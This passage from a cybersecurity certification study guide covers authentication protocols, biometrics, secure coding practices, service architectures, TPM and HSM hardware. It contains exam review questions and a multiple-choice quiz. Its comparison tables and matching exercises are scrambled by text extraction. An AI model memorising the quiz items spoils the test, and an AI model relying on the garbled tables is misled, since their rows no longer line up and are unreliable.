legitimate requests. Whitelisting looks for allowable characters
or patterns and allows only those. Input validation tools fall into
several categories:
Cloud-based services
Open source tools
Proprietary commercial products
Because these tools vary in the amount of skill required, the
choice should be made based on the skill sets represented on
the cybersecurity team. A fancy tool that no one knows how to
use is not an effective tool.
Output Encoding
Encoding is the process of changing data into another form
using code. When this process is applied to output, it is done to
prevent the inclusion of dangerous character types that might
be inserted by malicious individuals. When processing
untrusted user input for (web) applications, filter the input and
encode the output. That is the most widely given advice to
prevent (server-side) injections. Some common types of output
encoding include the following:
URL encoding: A method to encode information in a Uniform
Resource Identifier. There’s a set of reserved characters, which have
special meaning, and a set of unreserved, or safe characters, which
are safe to use. If a character is reserved, then the character is
encoded using the percent (%) sign, followed by its hexadecimal
digits.
Unicode: A standard for encoding, representing and handling
characters in most (if not all) languages. Best known is the UTF-8
character encoding standard, which is a variable-length encoding (1,
2, 3, or 4 units of 8 bits, hence the name UTF-8).
Session Management
Session management ensures that any instance of identification
and authentication to a resource is managed properly. This
includes managing desktop sessions and remote sessions.
Desktop sessions should be managed through a variety of
mechanisms. Screensavers allow computers to be locked if left
idle for a certain period of time. To reactivate a computer, the
user must log back in. Screensavers are a timeout mechanism,
and other timeout features may also be used, such as shutting
down or placing a computer in hibernation after a certain
period. Session or logon limitations allow organizations to
configure how many concurrent sessions a user can have.
Schedule limitations allow organizations to configure the time
during which a user can access a computer.
Remote sessions usually incorporate some of the same
mechanisms as desktop sessions. However, remote sessions do
not occur at the computer itself. Rather, they are carried out
over a network connection. Remote sessions should always use
secure connection protocols. In addition, if users will be
remotely connecting only from certain computers, the
organization may want to implement some type of rule-based
access control that allows only certain connections.
Authentication
If you have no authentication, you have no security and no
accountability. This section covers some authentication topics.
Context-based Authentication
Context-based authentication is a form of authentication that
takes multiple factors or attributes into consideration before
authenticating and authorizing an entity. So rather than simply
rely on the presentation of proper credentials, the system looks
at other factors when making the access decision, such as time
of day or location of the subject. Context-based security solves
many issues suffered by non-context-based systems. The
following are some of the key solutions it provides:
Helps prevent account takeovers made possible by simple password
systems
Helps prevent many attacks made possible by the increasing use of
personal mobile devices
Helps prevent many attacks made possible by the user’s location
Context-based systems can take a number of factors into
consideration when a user requests access to a resource. In
combination, these attributes can create a complex set of
security rules that can help prevent vulnerabilities that
password systems may be powerless to detect or stop. The
following sections look at some of these attributes.
Time
Cybersecurity professionals have for quite some time been able
to prevent access to a network entirely by configuring login
hours in a user’s account profile. However, they have not been
able to prevent access to individual resources on a time-of-day
basis until recently. For example, you might want to allow Joe
to access the sensitive Sales folder during the hours of 9 a.m. to
5 p.m. but deny him access to that folder during other hours. Or
you might configure the system so that when Joe accesses
resources after certain hours, he is required to give another
password or credential (a process often called step-up
authentication) or perhaps even have a text code sent to his email address that must be provided to allow this access.
Location
At one time, cybersecurity professionals knew that all the
network users were safely in the office and behind a secure
perimeter created and defended with every tool possible. That is
no longer the case. Users now access your network from home,
wireless hotspots, hotel rooms, and all sorts of other locations
that are less than secure. When you design authentication, you
can consider the physical location of the source of an access
request. A scenario for this might be that Alice is allowed to
access the Sales folder at any time from the office, but only from
9 a.m. to 5 p.m. from her home and never from elsewhere.
Authentication systems can also use location to identify
requests to authenticate and access a resource from two
different locations in a very short amount of time, one of which
could be fraudulent. Finally, these systems can sometimes make
real-time assessments of threat levels in the region where a
request originates.
Frequency
A context-based system can make access decisions based on the
frequency with which the requests are made. Because multiple
requests to log in coming very quickly can indicate a passwordcracking attack, the system can use this information to deny
access. It also can indicate that an automated process or
malware, rather than an individual, is attempting this
operation.
Behavioral
It is possible for authentication systems to track the behavior of
an individual over time and use this information to detect when
an entity is performing actions that, while within the rights of
the entity, differ from the normal activity of the entity. This
could be an indication that the account has been compromised.
The real strength of an authentication system lies in the way you
can combine the attributes just discussed to create very
granular policies such as the following: Gene can access the
Sales folder from 9 a.m. to 5 p.m. if he is in the office and is
using his desktop device, but can access the folder only from 10
a.m. to 3 p.m. if he is using his smartphone in the office, and
cannot access the folder at all from 9 a.m. to 5 p.m. if he is
outside the office.
The main security issue is that the complexity of the rule
creation can lead to mistakes that actually reduce security. A
complete understanding of the system is required, and special
training should be provided to anyone managing the system.
Other security issues include privacy issues, such as user
concerns about the potential misuse of information used to
make contextual decisions. These concerns can usually be
addressed through proper training about the power of contextbased security.
Network Authentication Methods
One of the protocol choices that must be made in creating a
remote access solution is the authentication protocol. The
following are some of the most important of those protocols:
Password Authentication Protocol (PAP): PAP provides
authentication, but the credentials are sent in cleartext and can be
read with a sniffer.
Challenge Handshake Authentication Protocol (CHAP):
CHAP solves the cleartext problem by operating without sending
the credentials across the link. The server sends the client a set of
random text called a challenge. The client encrypts the text with the
password and sends it back. The server then decrypts it with the
same password and compares the result with what was sent
originally. If the results match, the server can be assured that the
user or system possesses the correct password without ever needing
to send it across the untrusted network. Microsoft has created its
own variant of CHAP:
MS-CHAP v1: This is the first version of a variant of CHAP by
Microsoft. This protocol works only with Microsoft devices, and
while it stores the password more securely than CHAP, like any
other password-based system, it is susceptible to brute-force and
dictionary attacks.
MS-CHAP v2: This update to MS-CHAP provides stronger
encryption keys and mutual authentication, and it uses different
keys for sending and receiving.
Extensible Authentication Protocol (EAP): EAP is not a
single protocol but a framework for port-based access control that
uses the same three components that are used in RADIUS. A wide
variety of EAP implementations can use all sorts of authentication
mechanisms, including certificates, a public key infrastructure
(PKI), and even simple passwords:
EAP-MD5-CHAP: This variant of EAP uses the CHAP
challenge process, but the challenges and responses are sent as
EAP messages. It allows the use of passwords.
EAP-TLS: This form of EAP requires a PKI because it requires
certificates on both the server and clients. It is, however,
immune to password-based attacks as it does not use passwords.
EAP-TTLS: This form of EAP requires a certificate on the server
only. The client uses a password, but the password is sent within
a protected EAP message. It is, however, susceptible to
password-based attacks.
Table 9-3 compares the authentication protocols described
here.
Table 9-3 Authentication Protocols
Protoc
ol
Advantage
s
Disadvantag
es
Guidelines/Not
es
PA
P
Simplicity
Password sent
in cleartext
Do not
use
C
H
AP
No passwords are
exchanged
Susceptible to
dictionary and
brute-force
attacks
Ensure
complex
password
s
Widely supported
standard
M
SC
H
AP
v1
No passwords are
exchanged
M
SC
H
AP
v2
No passwords are
exchanged
Stronger password
storage than CHAP
Stronger password
storage than CHAP
Mutual authentication
Susceptible to
dictionary and
brute-force
attacks
Ensure
complex
password
s
Supported
only on
Microsoft
devices
If
possible,
use MSCHAP v2
instead
Susceptible to
dictionary and
brute-force
attacks
Ensure
complex
password
s
Supported
only on
Microsoft
devices
Not supported
on some
legacy
Microsoft
clients
E
AP
M
D5
C
H
AP
Supports passwordbased authentication
E
AP
-
The most secure form
of EAP; uses
certificates on the
server and client
Widely supported
standard
Susceptible to
dictionary and
brute-force
attacks
Ensure
complex
password
s
Requires a
PKI
No known
issues
TL
S
E
AP
TT
LS
Widely supported
standard
As secure as EAP-TLS
Only requires a
certificate on the
server
Allows passwords on
the client
More complex
to configure
Susceptible to
dictionary and
brute-force
attacks
Ensure
complex
password
s
More complex
to configure
IEEE 802.1X
IEEE 802.1X is a standard that defines a framework for
centralized port-based authentication. It can be applied to both
wireless and wired networks and uses three components:
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is
attempting to access the network
Authentication server: The centralized device that performs
authentication
The role of the authenticator can be performed by a wide variety
of network access devices, including remote-access servers
(both dial-up and VPN), switches, and wireless access points.
The role of the authentication server can be performed by a
Remote Authentication Dial-in User Service (RADIUS) or
Terminal Access Controller Access-Control System Plus
(TACACS+) server. The authenticator requests credentials from
the supplicant and, upon receiving those credentials, relays
them to the authentication server, where they are validated.
Upon successful verification, the authenticator is notified to
open the port for the supplicant to allow network access. This
process is illustrated in Figure 9-11.
Figure 9-11 IEEE 802.1X
While RADIUS and TACACS+ perform the same roles, they
have different characteristics. These differences must be
considered in the choice of a method. Keep in mind also that
while RADIUS is a standard, TACACS+ is Cisco proprietary.
Table 9-4 compares them.
Table 9-4 RADIUS and TACACs+
RADIUS
Transp
ort
Protoc
ol
TACACS+
Uses UDP, which
may result in faster
response
Uses TCP, which offers
more information for
troubleshooting
Confid
entialit
y
Encrypts only the
password in the
access-request
packet
Encrypts the entire body of
the packet but leaves a
standard TACACS+ header
for troubleshooting
Authe
nticati
on and
Author
ization
Combines
authentication and
authorization
Separates authentication,
authorization, and
accounting processes
Suppo
rted
Layer
3
Protoc
ols
Does not support
any of the
following:
Supports all protocols
NetBIOS Frame
Protocol Control
protocol
X.25 PAD
connections
Device
s
Does not support
securing the
available
commands on
routers and
switches
Supports securing the
available commands on
routers and switches
Traffic
Creates less traffic
Creates more traffic
Biometric Considerations
When considering biometric technologies, security
professionals should understand the following terms:
Enrollment time: The process of obtaining the sample that is
used by the biometric system. This process requires actions that
must be repeated several times.
Feature extraction: The approach to obtaining biometric
information from a collected sample of a user’s physiological or
behavioral characteristics.
Accuracy: The most important characteristic of biometric systems,
it is how correct the overall readings will be.
Throughput rate: The rate at which the biometric system can
scan characteristics and complete the analysis to permit or deny
access. The acceptable rate is 6–10 subjects per minute. A single
user should be able to complete the process in 5–10 seconds.
Acceptability: Describes the likelihood that users will accept and
follow the system.
False rejection rate (FRR): A measurement of the percentage of
valid users that will be falsely rejected by the system. This is called a
Type I error.
False acceptance rate (FAR): A measurement of the percentage
of invalid users that will be falsely accepted by the system. This is
called a Type II error. Type II errors are more dangerous than Type
I errors.
Crossover error rate (CER): The point at which FRR equals
FAR. Expressed as a percentage, this is the most important metric.
When analyzing biometric systems, security professionals often
refer to a Zephyr chart that illustrates the comparative strengths
and weaknesses of biometric systems. However, you should also
consider how effective each biometric system is and its level of
user acceptance. The following is a list of the more popular
biometric methods ranked by effectiveness, with the most
effective being first:
1. Iris scan
2. Retina scan
3. Fingerprint
4. Hand print
5. Hand geometry
6. Voice pattern
7. Keystroke pattern
8. Signature dynamics
The following is a list of the more popular biometric methods
ranked by user acceptance, with the methods that are ranked
more popular by users being first:
1. Voice pattern
2. Keystroke pattern
3. Signature dynamics
4. Hand geometry
5. Hand print
6. Fingerprint
7. Iris scan
8. Retina scan
When considering FAR, FRR, and CER, smaller values are
better. FAR errors are more dangerous than FRR errors.
Security professionals can use the CER for comparative analysis
when helping their organization decide which system to
implement. For example, voice print systems usually have
higher CERs than iris scans, hand geometry, or fingerprints.
Figure 9-12 shows the biometric enrollment and authentication
process.
Figure 9-12 Biometric Enrollment and Authentication
Process
Certificate-Based Authentication
The security of an authentication system can be raised
significantly if the system is certificate based rather than
password or PIN based. A digital certificate provides an entity—
usually a user—with the credentials to prove its identity and
associates that identity with a public key. At minimum, a digital
certificate must provide the serial number, the issuer, the
subject (owner), and the public key.
Using certificate-based authentication requires the deployment
of a public key infrastructure (PKI). PKIs include systems,
software, and communication protocols that distribute, manage,
and control public key cryptography. A PKI publishes digital
certificates. Because a PKI establishes trust within an
environment, a PKI can certify that a public key is tied to an
entity and verify that a public key is valid. Public keys are
published through digital certificates.
In some situations, it may be necessary to trust another
organization’s certificates or vice versa. Cross-certification
establishes trust relationships between certificate authorities so
that the participating CAs can rely on the other participants’
digital certificates and public keys. It enables users to validate
each other’s certificates when they are actually certified under
different certification hierarchies. A CA for one organization can
validate digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Data Protection
At this point, the criticality of protecting sensitive data
transferred by software should be quite clear. Sensitive data in
this context includes usernames, passwords, encryption keys,
and paths that applications need to function but that would
cause harm if discovered. Determining the proper method of
securing this information is critical and not easy. In the case of
passwords, a generally accepted rule is to not hard-code
passwords (although this was not always the case). Instead,
passwords should be protected using encryption when they are
included in application code. This makes them difficult to
change, reverse, or discover.
Parameterized Queries
There are two types of queries, parameterized and
nonparameterized. The difference between the two is that
parameterized queries require input values or parameters
and nonparameterized queries do not. The most important
reason to use parameterized queries is to avoid SQL injection
attacks. The following are some guidelines:
Use parameterized queries in ASP.NET and prepared statements in
Java to perform escaping of dangerous characters before the SQL
statement is passed to the database.
To prevent command injection attacks in SQL queries, use
parameterized APIs (or manually quote the strings if parameterized
APIs are unavailable).
STATIC ANALYSIS TOOLS
Static analysis refers to testing or examining software when
it is not running. The most common type of static analysis is
code review. Code review is the systematic investigation of the
code for security and functional problems. It can take many
forms, from simple peer review to formal code review. Code
review was covered earlier in this chapter. More on static
analysis was covered in Chapter 4.
DYNAMIC ANALYSIS TOOLS
Dynamic analysis is testing performed on software while it
is running. This testing can be performed manually or by using
automated testing tools. There are two general approaches to
dynamic analysis, which were covered in Chapter 4 but are
worth reviewing:
Synthetic transaction monitoring: A type of proactive
monitoring, often preferred for websites and applications. It
provides insight into the application’s availability and performance,
warning of any potential issue before users experience any
degradation in application behavior. It uses external agents to run
scripted transactions against an application. For example,
Microsoft’s System Center Operations Manager (SCOM) uses
synthetic transactions to monitor databases, websites, and TCP port
usage.
Real user monitoring (RUM): A type of passive monitoring that
captures and analyzes every transaction of every application or
website user. Unlike synthetic monitoring, which attempts to gain
performance insights by regularly testing synthetic interactions,
RUM cuts through the guesswork by analyzing exactly how your
users are interacting with the application.
FORMAL METHODS FOR VERIFICATION
OF CRITICAL SOFTWARE
Formal code review is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Formal methods can be used at a number of levels:
Level 0: Formal specification may be undertaken and then a
program developed from this informally. This is the least formal
method and the least expensive to undertake.
Level 1: Formal development and formal verification may be used
to produce a program in a more formal manner. For example,
proofs of properties or refinement from the specification to a
program may be undertaken. This may be most appropriate in highintegrity systems involving safety or security.
Level 2: Theorem provers may be used to undertake fully formal
machine-checked proofs. This can be very expensive and is only
practically worthwhile if the cost of mistakes is extremely high (e.g.,
in critical parts of microprocessor design).
SERVICE-ORIENTED ARCHITECTURE
A newer approach to providing a distributed computing model
is service-oriented architecture (SOA). It operates on the
theory of providing web-based communication functionality
without each application requiring redundant code to be written
per application. SOA is considered a software assurance best
practice because it uses standardized interfaces and
components called service brokers to facilitate communication
among web-based applications. Let’s look at some
implementations.
Security Assertions Markup Language (SAML)
Security Assertion Markup Language (SAML) is a
security attestation model built on XML and SOAP-based
services that allows for the exchange of authentication and
authorization data between systems and supports federated
identity management. SAML is covered in depth in Chapter 8,
“Security Solutions for Infrastructure Management.”
Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP) is a protocol
specification for exchanging structured information in the
implementation of web services in computer networks. The
SOAP specification defines a messaging framework which
consists of
The SOAP processing model: Defines the rules for processing a
SOAP message
The SOAP extensibility model: Defines the concepts of SOAP
features and SOAP modules
The SOAP binding framework: Describes the rules for defining
a binding to an underlying protocol that can be used for exchanging
SOAP messages between SOAP nodes
The SOAP message: Defines the structure of a SOAP message
One of the disadvantages of SOAP is the verbosity of its
operation. This has led many developers to use the REST
architecture, discussed next, instead. From a security
perspective, while the SOAP body can be partially or completely
encrypted, the SOAP header is not encrypted and allows
intermediaries to view the header data.
Representational State Transfer (REST)
Representational State Transfer (REST) is a
client/server model for interacting with content on remote
systems, typically using HTTP. It involves accessing and
modifying existing content and also adding content to a system
in a particular way. REST does not require a specific message
format during HTTP resource exchanges. It is up to a RESTful
web service to choose which formats are supported. RESTful
services are services that do not violate required restraints.
XML and JavaScript Object Notation (JSON) are two of the
most popular formats used by RESTful web services.
JSON is a simple text-based message format that is often used
with RESTful web services. Like XML, it is designed to be
readable, and this can help when debugging and testing. JSON
is derived from JavaScript and, therefore, is very popular as a
data format in web applications. REST/JSON has several
advantages over SOAP/XML:
Size: REST/JSON is a lot smaller and less bloated than
SOAP/XML. Therefore, much less data is passed over the network,
which is particularly important for mobile devices.
Efficiency: REST/JSON makes it easier to parse data, thereby
making it easier to extract and convert the data. As a result, it
requires much less from the client’s CPU.
Caching: REST/JSON provides improved response times and
server loading due to support from caching.
Implementation: REST/JSON interfaces are much easier than
SOAP/XML to design and implement.
SOAP/XML is generally preferred in transactional services such
as banking services.
Microservices
An SOA microservice is a self-contained piece of business
functionality with clear interfaces, not a layer in a monolithic
application. It is a variant of the SOA structural style and
arranges an application as a collection of these loosely coupled
services. The focus is on building single-function modules with
well-defined interfaces and operations. Figure 9-13 shows the
microservices architecture in comparison with a typical
monolithic structure.
FIGURE 9-13 Microservices
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 9-5
lists a reference of these key topics and the page numbers on
which each is found.
Table 9-5 Key Topics in Chapter 9
Key Topic Element
Description
Page Number
Bulleted
list
SCEP authorization mechanisms
2
5
8
Bulleted
list
Countermeasures to maintenance hooks
2
6
0
Figure
9-2
Cross-site request forgery
2
6
1
Bulleted
list
Countermeasures to CSRF
2
6
1
Figure
9-3
Click-jacking
2
6
2
Bulleted
list
NIST recommendations for
hardware/embedded device analysis
2
6
4
Figure
9-6
Secure boot
2
6
5
Number
ed list
SDLC
2
6
7
Number
ed list
Stress testing
2
7
2
Bulleted
list
Types of regression testing
2
7
3
Bulleted
list
Types of code review
2
7
3
Table 92
Black-box, gray-box, and white-box testing
comparison
2
7
4
Number
ed list
Code review process
2
7
5
Bulleted
list
Output encoding types
2
7
6
Bulleted
list
Network authentication protocols
2
7
9
Table 93
Authentication protocols comparison
2
8
0
Bulleted
list
802.1X components
2
8
1
Table 94
RADIUS and TACACS+ comparison
2
8
2
Bulleted
list
Biometric terms
2
8
2
Figure
9-12
Biometric enrollment and authentication
process
2
8
4
Bulleted
list
Guidelines for parameterized queries
2
8
5
Bulleted
list
Dynamic analysis approaches
2
8
6
Bulleted
list
Formal method levels for code review
2
8
6
Bulleted
list
SOAP specification framework
2
8
7
Bulleted
list
REST/JSON advantages over SOAP/XML
2
8
8
Figure
9-13
Microservices architecture vs. a typical
monolithic structure
2
8
9
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
corporate-owned, personally enabled (COPE)
application wrapping
remote wipes
Simple Certificate Enrollment Protocol (SCEP)
maintenance hook
time-of-check/time-of-use
cross-site request forgery (CSRF)
click-jacking
embedded
System-on-Chip (SoC)
software development life cycle (SDLC)
DevSecOps
user acceptance testing (UAT)
stress testing
security regression testing
input validation
output encoding
parameterized queries
static analysis
dynamic analysis
formal methods
service-oriented architecture (SOA)
Security Assertions Markup Language (SAML)
Simple Object Access Protocol (SOAP)
Representational State Transfer (REST)
microservice
REVIEW QUESTIONS
1. ____________________ is a strategy in which an
organization purchases mobile devices for users and users
manage those devices.
2. List at least one step in the NIST SP 800-163 Rev 1 process.
3. Match the terms on the left with their definitions on the
right.
Terms
Definitions
Maint
enanc
e
hooks
Attack that causes an end user to execute unwanted
actions on a web application in which the user is
currently authenticated
Timeofcheck
/time
-ofuse
attack
s
Attack that crafts a transparent page or frame over a
legitimate-looking page that entices the user to click
something
Cross
-site
reque
st
forger
y
(CSR
F)
Attack that attempts to take advantage of the sequence
of events that occurs as the system completes common
tasks
Clickjackin
g
A set of instructions built into the code that allows
someone who knows about the so-called backdoor to
use the instructions to connect to view and edit the code
without using the normal access controls
4. _______________ is a client/server model for
interacting with content on remote systems, typically using
HTTP.
5. List at least two advantage of REST/JSON over SOAP/XML.
6. Match the terms on the left with their definitions on the
right.
Ter
ms
Definitions
E
m
b
e
d
d
e
d
sy
st
e
m
An integrated circuit that includes all components of a
computer or another electronic system
S
o
C
Provides a predictable framework of procedures designed to
identify all requirements with regard to functionality, cost,
reliability, and delivery schedule and ensure that each is
met in the final solution
S
D
L
C
A computer system with a dedicated function within a larger
system
D
e
v
S
Development concept, emphasizing security, that grew out
of the DevOps approach
ec
O
p
s
7. __________________________ determines the
workload that the application can withstand.
8. List at least two forms of code review.
9. Match the terms on the left with their definitions on the
right.
Terms
Definitions
Regression
testing
Also called translucent testing, as the tester has
partial knowledge
Gray-box
testing
Internal workings of the application are fully
known
White-box
testing
Internal workings of the application are not
known
Black-box
testing
Testing the security after a change is made to the
software
10. ___________________ is a method to encode
information in a Uniform Resource Identifier.
Chapter 10
Hardware Assurance Best
Practices
This chapter covers the following topics related to Objective 2.3
(Explain hardware assurance best practices) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Hardware root of trust: Introduces the Trusted Platform
Module (TPM) and hardware security module (HSM).
eFuse: Covers the dynamic real-time reprogramming of computer
chips.
Unified Extensible Firmware Interface (UEFI): Discusses
the newer UEFI firmware interface.
Trusted foundry: Describes a program for hardware sourcing
assurance.
Secure processing: Covers Trusted Execution, secure enclave,
processor security extensions, and atomic execution.
Anti-tamper: Explores methods of preventing physical attacks.
Self-encrypting drive: Covers automatic drive protections.
Trusted firmware updates: Discusses methods for safely
acquiring firmware updates.
Measured Boot and attestation: Covers boot file protections.
Bus encryption: Describes the use of encrypted program
instructions on a data bus.
Organizations acquire hardware and services as part of day-today business. The supply chain for tangible property is vital to
every organization. An organization should understand all risks
for the supply chain and implement a risk management
program that is appropriate for it. This chapter discusses best
practices for ensuring that all hardware is free of security issues
out of the box.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
10-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 10-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Hardware Root of Trust
1
eFuse
2
Unified Extensible Firmware Interface (UEFI)
3
Trusted Foundry
4
Secure Processing
5
Anti-Tamper
6
Self-encrypting Drive
7
Trusted Firmware Updates
8
Measured Boot and Attestation
9
Bus Encryption
10
1. Which of the following is a draft publication that gives
guidelines on hardware-rooted security in mobile devices?
1. NIST SP 800-164
2. IEEE 802.11ac
3. FIPS 120
4. IEC/IOC 270017
2. Which of the following allows for the dynamic real-time
reprogramming of computer chips?
1. TAXII
2. eFuse
3. UEFI
4. TPM
3. Which of the following is designed as a replacement for the
traditional PC BIOS?
1. TPM
2. Secure boot
3. UEFI
4. NX bit
4. Which of the following ensures that systems have access to
leading-edge integrated circuits from secure, domestic
sources?
1. DoD
2. FIPS 120
3. OWASP
4. Trusted Foundry
5. Which of the following is a part of an operating system that
cannot be compromised even when the operating system
kernel is compromised?
1. Secure enclave
2. Processor security extensions
3. Atomic execution
4. XN bit
6. Which of the following technologies can zero out sensitive
data if it detects penetration of its security and may even do
this with no power?
1. TPM
2. Anti-tamper
3. Secure enclave
4. Measured boot
7. Which of the following is used to provide transparent
encryption on self-encrypting drives?
1. DEK
2. TPM
3. UEFI
4. ENISA
8. Which of the following is the key to trusted firmware
updates?
1. Obtain firmware updates only from the vendor directly
2. Use a third-party facilitator to obtain updates
3. Disable Secure Boot
4. Follow the specific directions with the update
9. Windows Secure Boot is an example of what technology?
1. Security extensions
2. Secure enclave
3. UEFI
4. Measured boot
10. What is used by newer Microsoft operating systems to
protect certificates, BIOS, passwords, and program
authenticity?
1. Security extensions
2. Bus encryption
3. UEFI
4. Secure enclaves
FOUNDATION TOPICS
HARDWARE ROOT OF TRUST
NIST SP 800-164 is a draft Special Publication that gives
guidelines on hardware-rooted security in mobile devices. It
defines three required security components for mobile devices:
Roots of Trust (RoTs), an application programming
interface (API) to expose the RoTs to the platform, and a Policy
Enforcement Engine (PEnE).
Roots of Trust are the foundation of assurance of the
trustworthiness of a mobile device. RoTs must always behave in
an expected manner because their misbehavior cannot be
detected. Hardware RoTs are preferred over software RoTs due
to their immutability, smaller attack surfaces, and more reliable
behavior. They can provide a higher degree of assurance that
they can be relied upon to perform their trusted function or
functions. Software RoTs could provide the benefit of quick
deployment to different platforms. To support device integrity,
isolation, and protected storage, devices should implement the
following RoTs:
Root of Trust for Storage (RTS)
Root of Trust for Verification (RTV)
Root of Trust for Integrity (RTI)
Root of Trust for Reporting (RTR)
Root of Trust for Measurement (RTM)
The RoTs need to be exposed by the operating system to
applications through an open API. This provides application
developers a set of security services and capabilities they can
use to secure their applications and protect the data they
process. By providing an abstracted layer of security services
and capabilities, these APIs can reduce the burden on
application developers to implement low-level security features,
and instead allow them to reuse trusted components provided
in the RoTs and the OS. The APIs should be standardized within
a given mobile platform and, to the extent possible, across
platforms. Applications can use the APIs, and the associated
RoTs, to request device integrity reports, protect data through
encryption services provided by the RTS, and store and retrieve
authentication credentials and other sensitive data.
The PEnE enforces policies on the device with the help of other
device components and enables the processing, maintenance,
and management of policies on both the device and in the
information owners’ environments. The PEnE provides
information owners with the ability to express the control they
require over their information. The PEnE needs to be trusted to
implement the information owner’s requirements correctly and
to prevent one information owner’s requirements from
adversely affecting another’s. To perform key functions, the
PEnE needs to be able to query the device’s configuration and
state.
Mobile devices should implement the following three mobile
security capabilities to address the challenges with mobile
device security:
Device integrity: Device integrity is the absence of corruption in
the hardware, firmware, and software of a device. A mobile device
can provide evidence that it has maintained device integrity if its
software, firmware, and hardware configurations can be shown to
be in a state that is trusted by a relying party.
Isolation: Isolation prevents unintended interaction between
applications and information contexts on the same device.
Protected storage: Protected storage preserves the
confidentiality and integrity of data on the device while at rest,
while in use (in the event an unauthorized application attempts to
access an item in protected storage), and upon revocation of access.
Trusted Platform Module (TPM)
Controlling network access to devices is helpful, but in many
cases, devices such as laptops, tablets, and smartphones leave
your network, leaving behind all the measures you have taken to
protect the network. There is also a risk of these devices being
stolen or lost. For these situations, the best measure to take is
full disk encryption.
The best implementation of full disk encryption requires and
makes use of a Trusted Platform Module (TPM) chip. A
TPM chip is a security chip installed on a computer’s
motherboard that is responsible for protecting symmetric and
asymmetric keys, hashes, and digital certificates. This chip
provides services to protect passwords and encrypt drives and
digital rights, making it much harder for attackers to gain access
to the computers that have TPM chips enabled.
Two particularly popular uses of TPM are binding and sealing.
Binding actually “binds” the hard drive through encryption to a
particular computer. Because the decryption key is stored in the
TPM chip, the hard drive’s contents are available only when the
drive is connected to the original computer. But keep in mind
that all the contents are at risk if the TPM chip fails and a
backup of the key does not exist.
Sealing, on the other hand, “seals” the system state to a
particular hardware and software configuration. This prevents
attackers from making any changes to the system. However, it
can also make installing a new piece of hardware or a new
operating system much harder. The system can only boot after
the TPM chip verifies system integrity by comparing the original
computed hash value of the system’s configuration to the hash
value of its configuration at boot time.
A TPM chip consists of both static memory and versatile
memory that is used to retain the important information when
the computer is turned off:
Endorsement key (EK): The EK is persistent memory installed
by the manufacturer that contains a public/private key pair.
Storage root key (SRK): The SRK is persistent memory that
secures the keys stored in the TPM.
Attestation identity key (AIK): The AIK is versatile memory
that ensures the integrity of the EK.
Platform configuration register (PCR) hash: A PCR hash is
versatile memory that stores data hashes for the sealing function.
Storage keys: A storage key is versatile memory that contains the
keys used to encrypt the computer’s storage, including hard drives,
USB flash drives, and so on.
BitLocker and BitLocker to Go by Microsoft are well-known full
disk encryption products. The former is used to encrypt hard
drives, including operating system drives, and the latter is used
to encrypt information on portable devices such as USB devices.
However, there are other options. Additional whole disk
encryption products include
PGP Whole Disk Encryption
SecurStar DriveCrypt
Sophos SafeGuard
Trend Micro Maximum Security
Virtual TPM
A virtual TPM (vTPM) chip is a software object that
performs the functions of a TPM chip. It is a system that enables
trusted computing for an unlimited number of virtual machines
on a single hardware platform. A vTPM makes secure storage
and cryptographic functions available to operating systems and
applications running in virtual machines.
Figure 10-1 shows one possible implementation of vTPM by
IBM. The TPM chip in the host system is replaced by a more
powerful vTPM (PCIXCC-vTPM). The virtual machine (VM)
named Dom-TPM is a VM whose only purpose is to proxy for
the PCIXCC-vTPM and make TPM instances available to all
other VMs running on the system.
A diagrammatic illustration of virtual TPM is presented.
FIGURE 10-1 vTPM Possible Solution 1
Another possible approach suggested by IBM is to run vTPMs
on each VM, as shown in Figure 10-2. In this case, the VM
named Dom-TPM talks to the physical TPM chip in the host and
maintains separate TPM instances for each VM.
Figure 10-2 vTPM Possible Solution 2
Hardware Security Module (HSM)
A hardware security module (HSM) is an appliance that
safeguards and manages digital keys used with strong
authentication and provides crypto processing. It attaches
directly to a computer or server. Among the functions of an
HSM are
Onboard secure cryptographic key generation
Onboard secure cryptographic key storage and management
Use of cryptographic and sensitive data material
Offloading of application servers for complete asymmetric and
symmetric cryptography
HSM devices can be used in a variety of scenarios, including the
following:
In a PKI environment to generate, store, and manage key pairs
In card payment systems to encrypt PINs and to load keys into
protected memory
To perform the processing for applications that use TLS/SSL
In Domain Name System Security Extensions (DNSSEC; a secure
form of DNS that protects the integrity of zone files) to store the
keys used to sign the zone file
There are some drawbacks to an HSM, including the following:
High cost
Lack of a standard for the strength of the random number generator
Difficulty in upgrading
When selecting an HSM product, you must ensure that it
provides the services needed, based on its application.
Remember that each HSM has different features and different
encryption technologies, and some HSM devices might not
support a strong enough encryption level to meet an
enterprise’s needs. Moreover, you should keep in mind the
portable nature of these devices and protect the physical
security of the area where they are connected.
MicroSD HSM
A microSD HSM is an HSM that connects to the microSD port
on a device that has such a port. The card is specifically suited
for mobile apps written for Android and is supported by most
Android phones and tablets with a microSD card slot.
Moreover, some microSD cards can be made to support various
cryptographic algorithms, such as AES, RSA, SHA-1, SHA-256,
and Triple DES, as well as the Diffie-Hellman key exchange.
This is an advantage over microSD cards that do not support
this, which enables them to provide the same protections as
microSD HSM.
EFUSE
Computer logic is generally hard-coded onto a chip and cannot
be changed after the chip is manufactured. An eFuse allows for
the dynamic real-time reprogramming of computer chips.
Utilizing a set of eFuses, a chip manufacturer can allow for the
circuits on a chip to change while it is in operation.
One use is to prevent downgrading the firmware of a device.
Systems equipped with an eFuse will check the number of burnt
fuses before attempting to install new firmware. If too many
fuses are burnt (meaning the firmware to be installed is older
